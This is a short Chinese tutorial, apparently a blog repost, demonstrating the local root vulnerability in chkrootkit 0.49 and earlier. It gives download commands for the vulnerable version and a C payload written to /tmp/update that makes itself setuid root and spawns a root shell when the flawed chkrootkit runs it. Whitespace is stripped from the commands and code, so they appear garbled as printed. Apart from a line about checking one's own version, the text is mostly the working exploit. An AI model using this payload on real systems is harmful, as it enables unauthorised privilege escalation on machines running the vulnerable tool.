Chkrootkit<=0.49LocalRootVulnerability:小于等于0.49版的chrootkit本地提权漏洞。先来演示下吧:
可以查看自己安装的是不是升到最新版了,或者下载有漏洞的版本进行实验:
wgetwgethttp://www.exploit-db.com/wp-content/themes/exploit/applications/304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gztarvfxz304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gzcdchkrootkit-0.49/
./chkrootkit-V
普通用户在/tmp目录下新建update.c(代码实示例如下):
#include<unistd.h>
voidmain(void)
{
system("chownroot:root/tmp/update");
system("chmod4755/tmp/update");
setuid(0);
setgid(0);
execl("/bin/sh","sh",NULL);
}
然后编译好update,看下update的文件详情:
执行有漏洞的chkrootkit:
再来看下update已经成功属于root组了!
以上就是查看自己Ckrootkit0.49是不是安装的是不是升到最新版了,或者下载有漏洞的版本进行实验的步骤,谢谢阅读,希望能帮到大家,请继续关注,我们会努力分享更多优秀的文章。